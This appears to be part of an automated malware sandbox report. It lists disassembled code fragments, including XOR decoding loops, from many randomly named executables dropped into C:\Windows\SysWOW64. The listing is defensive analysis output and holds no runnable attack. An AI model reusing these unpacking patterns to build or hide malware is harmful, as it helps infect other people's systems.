                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then xchg eax, ecx5_2_0042E0A0
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then add eax, edi5_2_0042E0A0
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then je 00403A1Ch5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then xor dword ptr [eax], ecx5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then inc eax5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then jne 004039F2h5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then mov eax, 0042A000h5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then je 00403A52h5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then xor dword ptr [eax], ecx5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then add eax, 04h5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then jne 00403A3Ah5_2_004039CE
                      Source: C:\Windows\SysWOW64\Olijjb32.exeCode function: 4x nop then popad 5_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]6_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then add ebx, 04h6_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then jl 00403A8Fh6_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then add eax, 0Ch6_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then popad 6_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then mov ebx, 00407EF8h6_2_0042E000
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then sub ecx, eax6_2_0042E000
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then push eax6_2_0042E000
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then popad 6_2_0042E000
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then pop edi6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then mov ebx, 00407EF8h6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then sub ecx, eax6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then xor edx, edx6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then push eax6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then div edi6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then xchg eax, ecx6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then add eax, edi6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then loop 00403B3Eh6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then mov eax, 0042A000h6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then mov ebx, 0042CD70h6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then sub ecx, eax6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then xor edx, edx6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then push eax6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then div edi6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then xchg eax, ecx6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then add eax, edi6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then loop 00403B9Eh6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then popad 6_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then je 00403A1Ch6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then xor dword ptr [eax], ecx6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then inc eax6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then jne 004039F2h6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then mov eax, 0042A000h6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then je 00403A52h6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then xor dword ptr [eax], ecx6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then add eax, 04h6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then jne 00403A3Ah6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oeanchcn.exeCode function: 4x nop then popad 6_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]7_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then add ebx, 04h7_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then jl 00403A8Fh7_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then add eax, 0Ch7_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then popad 7_2_00403A6B
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]7_2_0042E00C
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then mov edx, dword ptr [eax+08h]7_2_0042E00C
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then add ebx, 04h7_2_0042E00C
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then jne 0042E01Eh7_2_0042E00C
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then pop edi7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then mov ebx, 00407EF8h7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then sub ecx, eax7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then xor edx, edx7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then push eax7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then div edi7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then xchg eax, ecx7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then add eax, edi7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then loop 00403B3Eh7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then mov eax, 0042A000h7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then mov ebx, 0042CD70h7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then sub ecx, eax7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then xor edx, edx7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then push eax7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then div edi7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then xchg eax, ecx7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then add eax, edi7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then loop 00403B9Eh7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then popad 7_2_00403AC7
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then je 00403A1Ch7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then xor dword ptr [eax], ecx7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then inc eax7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then jne 004039F2h7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then mov eax, 0042A000h7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then je 00403A52h7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then xor dword ptr [eax], ecx7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then add eax, 04h7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then jne 00403A3Ah7_2_004039CE
                      Source: C:\Windows\SysWOW64\Oceoll32.exeCode function: 4x nop then popad 7_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]8_2_00403A6B
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then add ebx, 04h8_2_00403A6B
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then jl 00403A8Fh8_2_00403A6B
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then add eax, 0Ch8_2_00403A6B
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then popad 8_2_00403A6B
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then pushad 8_2_0042E000
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then xor dword ptr [eax], ecx8_2_0042E000
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then jne 0042E024h8_2_0042E000
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then test eax, eax8_2_0042E000
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then je 0042E084h8_2_0042E000
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then xor dword ptr [eax], ecx8_2_0042E000
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then pop edi8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then mov ebx, 00407EF8h8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then sub ecx, eax8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then xor edx, edx8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then push eax8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then div edi8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then xchg eax, ecx8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then add eax, edi8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then loop 00403B3Eh8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then mov eax, 0042A000h8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then mov ebx, 0042CD70h8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then sub ecx, eax8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then xor edx, edx8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then push eax8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then div edi8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then xchg eax, ecx8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then add eax, edi8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then loop 00403B9Eh8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then popad 8_2_00403AC7
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then popad 8_2_0042E09D
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then je 00403A1Ch8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then xor dword ptr [eax], ecx8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then inc eax8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then jne 004039F2h8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then mov eax, 0042A000h8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then je 00403A52h8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then xor dword ptr [eax], ecx8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then add eax, 04h8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then jne 00403A3Ah8_2_004039CE
                      Source: C:\Windows\SysWOW64\Onkcje32.exeCode function: 4x nop then popad 8_2_004039CE
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then mov ecx, dword ptr [eax+04h]9_2_00403A6B
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then add ebx, 04h9_2_00403A6B
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then jl 00403A8Fh9_2_00403A6B
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then add eax, 0Ch9_2_00403A6B
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then popad 9_2_00403A6B
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then div edi9_2_0042E000
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then xchg eax, ecx9_2_0042E000
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then cmp eax, 00000000h9_2_0042E000
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then mov ebx, 0042CD70h9_2_0042E000
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then popad 9_2_0042E000
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then jmp 00401219h9_2_0042E000
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then pop edi9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then mov ebx, 00407EF8h9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then sub ecx, eax9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then xor edx, edx9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then push eax9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then div edi9_2_00403AC7
                      Source: C:\Windows\SysWOW64\Odekfoij.exeCode function: 4x nop then xchg eax, ecx9_2_00403AC7
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then add eax, edi | 9_2_00403AC7
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then loop 00403B3Eh | 9_2_00403AC7
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then mov eax, 0042A000h | 9_2_00403AC7
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then mov ebx, 0042CD70h | 9_2_00403AC7
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then sub ecx, eax | 9_2_00403AC7
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then xor edx, edx | 9_2_00403AC7
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then push eax | 9_2_00403AC7
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then div edi | 9_2_00403AC7
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then xchg eax, ecx | 9_2_00403AC7
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then add eax, edi | 9_2_00403AC7
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then loop 00403B9Eh | 9_2_00403AC7
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then popad | 9_2_00403AC7
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then je 00403A1Ch | 9_2_004039CE
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then xor dword ptr [eax], ecx | 9_2_004039CE
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then inc eax | 9_2_004039CE
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then jne 004039F2h | 9_2_004039CE
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then mov eax, 0042A000h | 9_2_004039CE
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then je 00403A52h | 9_2_004039CE
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then xor dword ptr [eax], ecx | 9_2_004039CE
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then add eax, 04h | 9_2_004039CE
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then jne 00403A3Ah | 9_2_004039CE
Source: C:\Windows\SysWOW64\Odekfoij.exe | Code function: 4x nop then popad | 9_2_004039CE
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then mov ecx, dword ptr [eax+04h] | 10_2_00403A6B
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then add ebx, 04h | 10_2_00403A6B
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then jl 00403A8Fh | 10_2_00403A6B
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then add eax, 0Ch | 10_2_00403A6B
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then popad | 10_2_00403A6B
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then add eax, 00403AC5h | 10_2_0042E00C
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then mov ebx, dword ptr [eax] | 10_2_0042E00C
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then add eax, 0Ch | 10_2_0042E00C
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then pop edi | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then mov ebx, 00407EF8h | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then sub ecx, eax | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then xor edx, edx | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then push eax | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then div edi | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then xchg eax, ecx | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then add eax, edi | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then loop 00403B3Eh | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then mov eax, 0042A000h | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then mov ebx, 0042CD70h | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then sub ecx, eax | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then xor edx, edx | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then push eax | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then div edi | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then xchg eax, ecx | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then add eax, edi | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then loop 00403B9Eh | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then popad | 10_2_00403AC7
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then je 00403A1Ch | 10_2_004039CE
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then xor dword ptr [eax], ecx | 10_2_004039CE
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then inc eax | 10_2_004039CE
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then jne 004039F2h | 10_2_004039CE
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then mov eax, 0042A000h | 10_2_004039CE
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then je 00403A52h | 10_2_004039CE
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then xor dword ptr [eax], ecx | 10_2_004039CE
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then add eax, 04h | 10_2_004039CE
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then jne 00403A3Ah | 10_2_004039CE
Source: C:\Windows\SysWOW64\Ojacofgb.exe | Code function: 4x nop then popad | 10_2_004039CE
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then mov ecx, dword ptr [eax+04h] | 11_2_00403A6B
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then add ebx, 04h | 11_2_00403A6B
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then jl 00403A8Fh | 11_2_00403A6B
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then add eax, 0Ch | 11_2_00403A6B
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then popad | 11_2_00403A6B
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then call 0042E00Ch | 11_2_0042E000
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then pop eax | 11_2_0042E00C
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then mov edx, dword ptr [eax+08h] | 11_2_0042E00C
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then cmp dword ptr [eax], 00000000h | 11_2_0042E00C
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then popad | 11_2_0042E00C
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then pop edi | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then mov ebx, 00407EF8h | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then sub ecx, eax | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then xor edx, edx | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then push eax | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then div edi | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then xchg eax, ecx | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then add eax, edi | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then loop 00403B3Eh | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then mov eax, 0042A000h | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then mov ebx, 0042CD70h | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then sub ecx, eax | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then xor edx, edx | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then push eax | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then div edi | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then xchg eax, ecx | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then add eax, edi | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then loop 00403B9Eh | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then popad | 11_2_00403AC7
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then je 00403A1Ch | 11_2_004039CE
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then xor dword ptr [eax], ecx | 11_2_004039CE
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then inc eax | 11_2_004039CE
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then jne 004039F2h | 11_2_004039CE
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then mov eax, 0042A000h | 11_2_004039CE
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then je 00403A52h | 11_2_004039CE
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then xor dword ptr [eax], ecx | 11_2_004039CE
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then add eax, 04h | 11_2_004039CE
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then jne 00403A3Ah | 11_2_004039CE
Source: C:\Windows\SysWOW64\Ppllkpoo.exe | Code function: 4x nop then popad | 11_2_004039CE
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then mov ecx, dword ptr [eax+04h] | 12_2_00403A6B
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then add ebx, 04h | 12_2_00403A6B
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then jl 00403A8Fh | 12_2_00403A6B
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then add eax, 0Ch | 12_2_00403A6B
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then popad | 12_2_00403A6B
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then mov ecx, ebx | 12_2_0042E000
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then push eax | 12_2_0042E000
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then mov esi, 679D3F73h | 12_2_0042E000
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then push eax | 12_2_0042E000
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then div edi | 12_2_0042E000
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then add eax, edi | 12_2_0042E000
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then pop edi | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then mov ebx, 00407EF8h | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then sub ecx, eax | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then xor edx, edx | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then push eax | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then div edi | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then xchg eax, ecx | 12_2_00403AC7
Source: C:\Windows\SysWOW64\Plbmqa32.exe | Code function: 4x nop then add eax, edi | 12_2_00403AC7
